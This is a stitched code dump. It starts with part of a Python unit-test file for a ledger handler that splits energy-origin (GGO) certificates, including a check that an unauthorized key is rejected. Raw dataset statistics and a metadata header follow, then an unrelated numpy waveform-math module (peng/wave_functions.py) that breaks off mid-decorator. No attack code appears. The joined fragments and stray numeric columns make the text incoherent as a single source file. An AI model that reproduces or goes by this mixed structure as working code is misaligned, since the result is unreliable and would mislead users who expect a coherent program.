def create_fake_transaction(self, inputs, outputs, payload, key: BIP32Key):
return FakeTransaction(
header=FakeTransactionHeader(
batcher_public_key=key.PublicKey().hex(),
dependencies=[],
family_name="datahub",
family_version="0.1",
inputs=inputs,
outputs=outputs,
signer_public_key=key.PublicKey().hex()),
payload=payload
)
@pytest.mark.unittest
def test_identifiers(self):
handler = SplitGGOTransactionHandler()
self.assertEqual(handler.family_name, 'SplitGGORequest')
self.assertEqual(len(handler.family_versions), 1)
self.assertIn('0.1', handler.family_versions)
self.assertEqual(len(handler.namespaces), 1)
self.assertIn('849c0b', handler.namespaces)
@pytest.mark.unittest
def test_internal_error(self):
with self.assertRaises(InternalError) as invalid_transaction:
SplitGGOTransactionHandler().apply(None, None)
self.assertEqual(str(invalid_transaction.exception), 'An unknown error has occured.')
@pytest.mark.unittest
def test_transfer_ggo_success(self):
key = BIP32Key.fromEntropy("the_valid_key_that_owns_the_specific_ggo".encode())
ggo_src = generate_address(AddressPrefix.GGO, key.PublicKey())
ggo = GGO.get_schema().dumps(GGO(
origin='meaaaa1c37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c',
amount=80,
begin=datetime(2020,1,1,12, tzinfo=timezone.utc),
end=datetime(2020,1,1,13, tzinfo=timezone.utc),
tech_type='T12412',
fuel_type='F010101',
sector='DK1',
next=None,
emissions={
"co2": {
"value": 1113342.14,
"unit": "g/Wh",
},
"so2": {
"value": 9764446,
"unit": "g/Wh",
},
}
)).encode('utf8')
context = MockContext(states={
ggo_src: ggo
})
payload = class_schema(SplitGGORequest)().dumps(SplitGGORequest(
origin=ggo_src,
parts=[
SplitGGOPart(address="split1_add", amount=10),
SplitGGOPart(address="split2_add", amount=20),
SplitGGOPart(address="split3_add", amount=50)
]
)).encode('utf8')
transaction = self.create_fake_transaction(
inputs=[ggo_src, "split1_add", "split2_add", "split3_add"],
outputs=[ggo_src, "split1_add", "split2_add", "split3_add"],
payload=payload,
key=key)
SplitGGOTransactionHandler().apply(transaction, context)
self.assertIn(ggo_src, context.states)
obj = json.loads(context.states[ggo_src].decode('utf8'))
self.assertEqual(len(obj), 9)
self.assertEqual(obj['origin'], 'meaaaa1c37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c')
self.assertEqual(obj['amount'], 80)
self.assertEqual(obj['begin'], '2020-01-01T12:00:00+00:00')
self.assertEqual(obj['end'], '2020-01-01T13:00:00+00:00')
self.assertEqual(obj['sector'], 'DK1')
self.assertEqual(obj['tech_type'], 'T12412')
self.assertEqual(obj['fuel_type'], 'F010101')
self.assertEqual(obj['emissions'], {
"co2": {
"value": 1113342.14,
"unit": "g/Wh",
},
"so2": {
"value": 9764446,
"unit": "g/Wh",
},
})
self.assertEqual(obj['next']['action'], GGOAction.SPLIT.name)
self.assertEqual(len(obj['next']['addresses']), 3)
self.assertEqual(obj['next']['addresses'][0], 'split1_add')
self.assertEqual(obj['next']['addresses'][1], 'split2_add')
self.assertEqual(obj['next']['addresses'][2], 'split3_add')
obj = json.loads(context.states['split1_add'].decode('utf8'))
self.assertEqual(len(obj), 9)
self.assertEqual(obj['origin'], ggo_src)
self.assertEqual(obj['amount'], 10)
self.assertEqual(obj['begin'], '2020-01-01T12:00:00+00:00')
self.assertEqual(obj['end'], '2020-01-01T13:00:00+00:00')
self.assertEqual(obj['sector'], 'DK1')
self.assertEqual(obj['tech_type'], 'T12412')
self.assertEqual(obj['fuel_type'], 'F010101')
self.assertEqual(obj['emissions'], {
"co2": {
"value": 1113342.14,
"unit": "g/Wh",
},
"so2": {
"value": 9764446,
"unit": "g/Wh",
},
})
self.assertEqual(obj['next'], None)
obj = json.loads(context.states['split2_add'].decode('utf8'))
self.assertEqual(len(obj), 9)
self.assertEqual(obj['origin'], ggo_src)
self.assertEqual(obj['amount'], 20)
self.assertEqual(obj['begin'], '2020-01-01T12:00:00+00:00')
self.assertEqual(obj['end'], '2020-01-01T13:00:00+00:00')
self.assertEqual(obj['sector'], 'DK1')
self.assertEqual(obj['tech_type'], 'T12412')
self.assertEqual(obj['fuel_type'], 'F010101')
self.assertEqual(obj['emissions'], {
"co2": {
"value": 1113342.14,
"unit": "g/Wh",
},
"so2": {
"value": 9764446,
"unit": "g/Wh",
},
})
self.assertEqual(obj['next'], None)
obj = json.loads(context.states['split3_add'].decode('utf8'))
self.assertEqual(len(obj), 9)
self.assertEqual(obj['origin'], ggo_src)
self.assertEqual(obj['amount'], 50)
self.assertEqual(obj['begin'], '2020-01-01T12:00:00+00:00')
self.assertEqual(obj['end'], '2020-01-01T13:00:00+00:00')
self.assertEqual(obj['sector'], 'DK1')
self.assertEqual(obj['tech_type'], 'T12412')
self.assertEqual(obj['fuel_type'], 'F010101')
self.assertEqual(obj['emissions'], {
"co2": {
"value": 1113342.14,
"unit": "g/Wh",
},
"so2": {
"value": 9764446,
"unit": "g/Wh",
},
})
self.assertEqual(obj['next'], None)
@pytest.mark.unittest
def test_transfer_ggo_sum_not_equal(self):
key = BIP32Key.fromEntropy("the_valid_key_that_owns_the_specific_ggo".encode())
ggo_src = generate_address(AddressPrefix.GGO, key.PublicKey())
ggo = GGO.get_schema().dumps(GGO(
origin='meaaaa1c37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c',
amount=40,
begin=datetime(2020,1,1,12, tzinfo=timezone.utc),
end=datetime(2020,1,1,13, tzinfo=timezone.utc),
tech_type='T12412',
fuel_type='F010101',
sector='DK1',
next=None
)).encode('utf8')
context = MockContext(states={
ggo_src: ggo
})
payload = class_schema(SplitGGORequest)().dumps(SplitGGORequest(
origin=ggo_src,
parts=[
SplitGGOPart(address="split1_add", amount=10),
SplitGGOPart(address="split2_add", amount=20),
]
)).encode('utf8')
transaction = self.create_fake_transaction(
inputs=[ggo_src, "split1_add", "split2_add", "split3_add"],
outputs=[ggo_src, "split1_add", "split2_add", "split3_add"],
payload=payload,
key=key)
with self.assertRaises(InvalidTransaction) as invalid_transaction:
SplitGGOTransactionHandler().apply(transaction, context)
self.assertEqual(str(invalid_transaction.exception), 'The sum of the parts does not equal the whole')
@pytest.mark.unittest
def test_transfer_ggo_no_src_ggo(self):
key = BIP32Key.fromEntropy("the_valid_key_that_owns_the_specific_ggo".encode())
ggo_src = generate_address(AddressPrefix.GGO, key.PublicKey())
ggo_dst = 'ggonextc37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c'
context = MockContext(states={
})
payload = class_schema(SplitGGORequest)().dumps(SplitGGORequest(
origin=ggo_src,
parts=[
SplitGGOPart(address="split1_add", amount=10),
SplitGGOPart(address="split2_add", amount=20)
]
)).encode('utf8')
transaction = self.create_fake_transaction(
inputs=[ggo_src, ggo_dst],
outputs=[ggo_src, ggo_dst],
payload=payload,
key=key)
with self.assertRaises(InvalidTransaction) as invalid_transaction:
SplitGGOTransactionHandler().apply(transaction, context)
self.assertEqual(str(invalid_transaction.exception), f'Address "{ggo_src}" does not contain a valid GGO.')
@pytest.mark.unittest
def test_transfer_ggo_not_available(self):
key = BIP32Key.fromEntropy("the_valid_key_that_owns_the_specific_ggo".encode())
ggo_src = generate_address(AddressPrefix.GGO, key.PublicKey())
ggo_dst = 'ggonextc37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c'
ggo = GGO.get_schema().dumps(GGO(
origin='meaaaa1c37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c',
amount=123,
begin=datetime(2020,1,1,12, tzinfo=timezone.utc),
end=datetime(2020,1,1,13, tzinfo=timezone.utc),
tech_type='T12412',
fuel_type='F010101',
sector='DK1',
next=GGONext(GGOAction.TRANSFER, ['somewhereontheledger'])
)).encode('utf8')
context = MockContext(states={
ggo_src: ggo
})
payload = class_schema(SplitGGORequest)().dumps(SplitGGORequest(
origin=ggo_src,
parts=[
SplitGGOPart(address="split1_add", amount=10),
SplitGGOPart(address="split2_add", amount=20)
]
)).encode('utf8')
transaction = self.create_fake_transaction(
inputs=[ggo_src, ggo_dst],
outputs=[ggo_src, ggo_dst],
payload=payload,
key=key)
with self.assertRaises(InvalidTransaction) as invalid_transaction:
SplitGGOTransactionHandler().apply(transaction, context)
self.assertEqual(str(invalid_transaction.exception), 'GGO already has been used')
@pytest.mark.unittest
def test_transfer_ggo_not_authorized(self):
key_owner = BIP32Key.fromEntropy("the_valid_key_that_owns_the_specific_ggo".encode())
key_criminal = BIP32Key.fromEntropy("this_key_should_not_be_authorized".encode())
ggo_src = generate_address(AddressPrefix.GGO, key_owner.PublicKey())
ggo_dst = 'ggonextc37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c'
ggo = GGO.get_schema().dumps(GGO(
origin='meaaaa1c37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c',
amount=30,
begin=datetime(2020,1,1,12, tzinfo=timezone.utc),
end=datetime(2020,1,1,13, tzinfo=timezone.utc),
tech_type='T12412',
fuel_type='F010101',
sector='DK1',
next=None
)).encode('utf8')
context = MockContext(states={
ggo_src: ggo
})
payload = class_schema(SplitGGORequest)().dumps(SplitGGORequest(
origin=ggo_src,
parts=[
SplitGGOPart(address="split1_add", amount=10),
SplitGGOPart(address="split2_add", amount=20)
]
)).encode('utf8')
transaction = self.create_fake_transaction(
inputs=[ggo_src, ggo_dst],
outputs=[ggo_src, ggo_dst],
payload=payload,
key=key_criminal)
with self.assertRaises(InvalidTransaction) as invalid_transaction:
SplitGGOTransactionHandler().apply(transaction, context)
self.assertEqual(str(invalid_transaction.exception), 'Invalid key for GGO')
@pytest.mark.unittest
def test_transfer_ggo_address_not_empty(self):
key = BIP32Key.fromEntropy("the_valid_key_that_owns_the_specific_ggo".encode())
ggo_src = generate_address(AddressPrefix.GGO, key.PublicKey())
ggo_dst = 'ggonextc37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c'
ggo = GGO.get_schema().dumps(GGO(
origin='meaaaa1c37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c',
amount=30,
begin=datetime(2020,1,1,12, tzinfo=timezone.utc),
end=datetime(2020,1,1,13, tzinfo=timezone.utc),
tech_type='T12412',
fuel_type='F010101',
sector='DK1',
next=None
)).encode('utf8')
ggo2 = GGO.get_schema().dumps(GGO(
origin='meaaaa29d5271edd8b4c2714e3c8979c1c37509b1de4a7f9f1c59e0efc2ed285e7c96c',
amount=123,
begin=datetime(2020,1,1,12, tzinfo=timezone.utc),
end=datetime(2020,1,1,13, tzinfo=timezone.utc),
tech_type='T12412',
fuel_type='F010101',
sector='DK1',
next=None
)).encode('utf8')
context = MockContext(states={
ggo_src: ggo,
"split1_add": ggo2
})
payload = class_schema(SplitGGORequest)().dumps(SplitGGORequest(
origin=ggo_src,
parts=[
SplitGGOPart(address="split1_add", amount=10),
SplitGGOPart(address="split2_add", amount=20)
]
)).encode('utf8')
transaction = self.create_fake_transaction(
inputs=[ggo_src, ggo_dst],
outputs=[ggo_src, ggo_dst],
payload=payload,
key=key)
with self.assertRaises(InvalidTransaction) as invalid_transaction:
SplitGGOTransactionHandler().apply(transaction, context)
self.assertEqual(str(invalid_transaction.exception), 'Destination address not empty')
| 36.36165
| 132
| 0.59462
| 1,459
| 14,981
| 5.94037
| 0.122687
| 0.091727
| 0.080997
| 0.019384
| 0.801777
| 0.769124
| 0.753086
| 0.740625
| 0.721472
| 0.721472
| 0
| 0.093006
| 0.282291
| 14,981
| 411
| 133
| 36.450122
| 0.713077
| 0
| 0
| 0.721713
| 1
| 0
| 0.165743
| 0.082972
| 0
| 0
| 0
| 0
| 0.189602
| 1
| 0.027523
| false
| 0
| 0.030581
| 0.003058
| 0.06422
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0b736d3920bf1e9d3b7f5791cb05bad5e9706c47
| 62,878
|
py
|
Python
|
peng/wave_functions.py
|
pmacosta/peng
|
ab05fac3c0a6c0f8c70ab3e456b5cc57f0484389
|
[
"MIT"
] | null | null | null |
peng/wave_functions.py
|
pmacosta/peng
|
ab05fac3c0a6c0f8c70ab3e456b5cc57f0484389
|
[
"MIT"
] | 1
|
2019-03-08T15:50:54.000Z
|
2019-03-08T15:50:54.000Z
|
peng/wave_functions.py
|
pmacosta/peng
|
ab05fac3c0a6c0f8c70ab3e456b5cc57f0484389
|
[
"MIT"
] | 2
|
2017-07-04T02:07:20.000Z
|
2019-02-07T16:05:09.000Z
|
"""
Waveform pseudo-type functions.
[[[cog
import os, sys
if sys.hexversion < 0x03000000:
import __builtin__
else:
import builtins as __builtin__
sys.path.append(os.environ['TRACER_DIR'])
import trace_ex_eng_wave_functions
exobj_eng = trace_ex_eng_wave_functions.trace_module(no_print=True)
]]]
[[[end]]]
"""
# wave_functions.py
# Copyright (c) 2013-2019 Pablo Acosta-Serafini
# See LICENSE for details
# pylint: disable=C0103,C0111,C0413,E1101,E1111,R0913,W0212
# Standard library imports
import copy
import math
import os
import warnings
# PyPI imports
if os.environ.get("READTHEDOCS", "") != "True":
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=RuntimeWarning)
import numpy as np
import pexdoc.exh
import pexdoc.pcontracts
# Intra-package imports imports
from .functions import remove_extra_delims
from .constants import FP_ATOL, FP_RTOL
from .wave_core import _interp_dep_vector, Waveform
###
# Functions
###
def _barange(bmin, bmax, inc):
vector = np.arange(bmin, bmax + inc, inc)
vector = vector if np.isclose(bmax, vector[-1], FP_RTOL, FP_ATOL) else vector[:-1]
return vector
def _bound_waveform(wave, indep_min, indep_max):
"""Add independent variable vector bounds if they are not in vector."""
indep_min, indep_max = _validate_min_max(wave, indep_min, indep_max)
indep_vector = copy.copy(wave._indep_vector)
if (
isinstance(indep_min, float) or isinstance(indep_max, float)
) and indep_vector.dtype.name.startswith("int"):
indep_vector = indep_vector.astype(float)
min_pos = np.searchsorted(indep_vector, indep_min)
if not np.isclose(indep_min, indep_vector[min_pos], FP_RTOL, FP_ATOL):
indep_vector = np.insert(indep_vector, min_pos, indep_min)
max_pos = np.searchsorted(indep_vector, indep_max)
if not np.isclose(indep_max, indep_vector[max_pos], FP_RTOL, FP_ATOL):
indep_vector = np.insert(indep_vector, max_pos, indep_max)
dep_vector = _interp_dep_vector(wave, indep_vector)
wave._indep_vector = indep_vector[min_pos : max_pos + 1]
wave._dep_vector = dep_vector[min_pos : max_pos + 1]
def _build_units(indep_units, dep_units, op):
"""Build unit math operations."""
if (not dep_units) and (not indep_units):
return ""
if dep_units and (not indep_units):
return dep_units
if (not dep_units) and indep_units:
return (
remove_extra_delims("1{0}({1})".format(op, indep_units))
if op == "/"
else remove_extra_delims("({0})".format(indep_units))
)
return remove_extra_delims("({0}){1}({2})".format(dep_units, op, indep_units))
def _operation(wave, desc, units, fpointer):
"""Perform generic operation on a waveform object."""
ret = copy.copy(wave)
ret.dep_units = units
ret.dep_name = "{0}({1})".format(desc, ret.dep_name)
ret._dep_vector = fpointer(ret._dep_vector)
return ret
def _running_area(indep_vector, dep_vector):
"""Calculate running area under curve."""
rect_height = np.minimum(dep_vector[:-1], dep_vector[1:])
rect_base = np.diff(indep_vector)
rect_area = np.multiply(rect_height, rect_base)
triang_height = np.abs(np.diff(dep_vector))
triang_area = 0.5 * np.multiply(triang_height, rect_base)
return np.cumsum(np.concatenate((np.array([0.0]), triang_area + rect_area)))
def _validate_min_max(wave, indep_min, indep_max):
"""Validate min and max bounds are within waveform's independent variable vector."""
imin, imax = False, False
if indep_min is None:
indep_min = wave._indep_vector[0]
imin = True
if indep_max is None:
indep_max = wave._indep_vector[-1]
imax = True
if imin and imax:
return indep_min, indep_max
exminmax = pexdoc.exh.addex(
RuntimeError, "Incongruent `indep_min` and `indep_max` arguments"
)
exmin = pexdoc.exh.addai("indep_min")
exmax = pexdoc.exh.addai("indep_max")
exminmax(bool(indep_min >= indep_max))
exmin(
bool(
(indep_min < wave._indep_vector[0])
and (not np.isclose(indep_min, wave._indep_vector[0], FP_RTOL, FP_ATOL))
)
)
exmax(
bool(
(indep_max > wave._indep_vector[-1])
and (not np.isclose(indep_max, wave._indep_vector[-1], FP_RTOL, FP_ATOL))
)
)
return indep_min, indep_max
@pexdoc.pcontracts.contract(wave=Waveform)
def acos(wave):
r"""
Return the arc cosine of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.acos
:raises:
* RuntimeError (Argument \`wave\` is not valid)
* ValueError (Math domain error)
.. [[[end]]]
"""
pexdoc.exh.addex(
ValueError,
"Math domain error",
bool((min(wave._dep_vector) < -1) or (max(wave._dep_vector) > 1)),
)
return _operation(wave, "acos", "rad", np.arccos)
@pexdoc.pcontracts.contract(wave=Waveform)
def acosh(wave):
r"""
Return the hyperbolic arc cosine of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.acosh
:raises:
* RuntimeError (Argument \`wave\` is not valid)
* ValueError (Math domain error)
.. [[[end]]]
"""
pexdoc.exh.addex(ValueError, "Math domain error", bool(min(wave._dep_vector) < 1))
return _operation(wave, "acosh", "", np.arccosh)
@pexdoc.pcontracts.contract(wave=Waveform)
def asin(wave):
r"""
Return the arc sine of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.asin
:raises:
* RuntimeError (Argument \`wave\` is not valid)
* ValueError (Math domain error)
.. [[[end]]]
"""
pexdoc.exh.addex(
ValueError,
"Math domain error",
bool((min(wave._dep_vector) < -1) or (max(wave._dep_vector) > 1)),
)
return _operation(wave, "asin", "rad", np.arcsin)
@pexdoc.pcontracts.contract(wave=Waveform)
def asinh(wave):
r"""
Return the hyperbolic arc sine of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.asinh
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
return _operation(wave, "asinh", "", np.arcsinh)
@pexdoc.pcontracts.contract(wave=Waveform)
def atan(wave):
r"""
Return the arc tangent of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.atan
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
return _operation(wave, "atan", "rad", np.arctan)
@pexdoc.pcontracts.contract(wave=Waveform)
def atanh(wave):
r"""
Return the hyperbolic arc tangent of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.atanh
:raises:
* RuntimeError (Argument \`wave\` is not valid)
* ValueError (Math domain error)
.. [[[end]]]
"""
pexdoc.exh.addex(
ValueError,
"Math domain error",
bool((min(wave._dep_vector) < -1) or (max(wave._dep_vector) > 1)),
)
return _operation(wave, "atanh", "", np.arctanh)
@pexdoc.pcontracts.contract(
wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def average(wave, indep_min=None, indep_max=None):
r"""
Return the running average of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.average
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
.. [[[end]]]
"""
ret = copy.copy(wave)
_bound_waveform(ret, indep_min, indep_max)
area = _running_area(ret._indep_vector, ret._dep_vector)
area[0] = ret._dep_vector[0]
deltas = ret._indep_vector - ret._indep_vector[0]
deltas[0] = 1.0
ret._dep_vector = np.divide(area, deltas)
ret.dep_name = "average({0})".format(ret._dep_name)
return ret
@pexdoc.pcontracts.contract(wave=Waveform)
def ceil(wave):
r"""
Return the ceiling of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.ceil
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
return _operation(wave, "ceil", wave.dep_units, np.ceil)
@pexdoc.pcontracts.contract(wave=Waveform)
def cos(wave):
r"""
Return the cosine of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for peng.wave_functions.cos
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
return _operation(wave, "cos", "", np.cos)
@pexdoc.pcontracts.contract(wave=Waveform)
def cosh(wave):
r"""
Return the hyperbolic cosine of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.cosh
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
return _operation(wave, "cosh", "", np.cosh)
@pexdoc.pcontracts.contract(wave=Waveform)
def db(wave):
r"""
Return a waveform's dependent variable vector expressed in decibels.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for peng.wave_functions.db
:raises:
* RuntimeError (Argument \`wave\` is not valid)
* ValueError (Math domain error)
.. [[[end]]]
"""
pexdoc.exh.addex(
ValueError, "Math domain error", bool((np.min(np.abs(wave._dep_vector)) <= 0))
)
ret = copy.copy(wave)
ret.dep_units = "dB"
ret.dep_name = "db({0})".format(ret.dep_name)
ret._dep_vector = 20.0 * np.log10(np.abs(ret._dep_vector))
return ret
@pexdoc.pcontracts.contract(
wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def derivative(wave, indep_min=None, indep_max=None):
r"""
Return the numerical derivative of a waveform's dependent variable vector.
The method used is the `backwards differences
<https://en.wikipedia.org/wiki/
Finite_difference#Forward.2C_backward.2C_and_central_differences>`_ method
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: float
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.derivative
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
.. [[[end]]]
"""
ret = copy.copy(wave)
_bound_waveform(ret, indep_min, indep_max)
delta_indep = np.diff(ret._indep_vector)
delta_dep = np.diff(ret._dep_vector)
delta_indep = np.concatenate((np.array([delta_indep[0]]), delta_indep))
delta_dep = np.concatenate((np.array([delta_dep[0]]), delta_dep))
ret._dep_vector = np.divide(delta_dep, delta_indep)
ret.dep_name = "derivative({0})".format(ret._dep_name)
ret.dep_units = _build_units(ret.indep_units, ret.dep_units, "/")
return ret
@pexdoc.pcontracts.contract(wave=Waveform)
def exp(wave):
r"""
Return the natural exponent of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for peng.wave_functions.exp
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
return _operation(wave, "exp", "", np.exp)
@pexdoc.pcontracts.contract(
wave=Waveform,
npoints="None|(int,>=1)",
indep_min="None|number",
indep_max="None|number",
)
def fft(wave, npoints=None, indep_min=None, indep_max=None):
r"""
Return the Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for peng.wave_functions.fft
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]]
"""
ret = copy.copy(wave)
_bound_waveform(ret, indep_min, indep_max)
npoints = npoints or ret._indep_vector.size
fs = (npoints - 1) / float(ret._indep_vector[-1])
spoints = min(ret._indep_vector.size, npoints)
sdiff = np.diff(ret._indep_vector[:spoints])
cond = not np.all(
np.isclose(sdiff, sdiff[0] * np.ones(spoints - 1), FP_RTOL, FP_ATOL)
)
pexdoc.addex(RuntimeError, "Non-uniform sampling", cond)
finc = fs / float(npoints - 1)
indep_vector = _barange(-fs / 2.0, +fs / 2.0, finc)
dep_vector = np.fft.fft(ret._dep_vector, npoints)
return Waveform(
indep_vector=indep_vector,
dep_vector=dep_vector,
dep_name="fft({0})".format(ret.dep_name),
indep_scale="LINEAR",
dep_scale="LINEAR",
indep_units="Hz",
dep_units="",
)
@pexdoc.pcontracts.contract(
wave=Waveform,
npoints="None|(int,>=1)",
indep_min="None|number",
indep_max="None|number",
)
def fftdb(wave, npoints=None, indep_min=None, indep_max=None):
r"""
Return the Fast Fourier Transform of a waveform.
The dependent variable vector of the returned waveform is expressed in decibels
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.fftdb
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]]
"""
return db(fft(wave, npoints, indep_min, indep_max))
@pexdoc.pcontracts.contract(
wave=Waveform,
npoints="None|(int,>=1)",
indep_min="None|number",
indep_max="None|number",
)
def ffti(wave, npoints=None, indep_min=None, indep_max=None):
r"""
Return the imaginary part of the Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.ffti
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]]
"""
return imag(fft(wave, npoints, indep_min, indep_max))
@pexdoc.pcontracts.contract(
wave=Waveform,
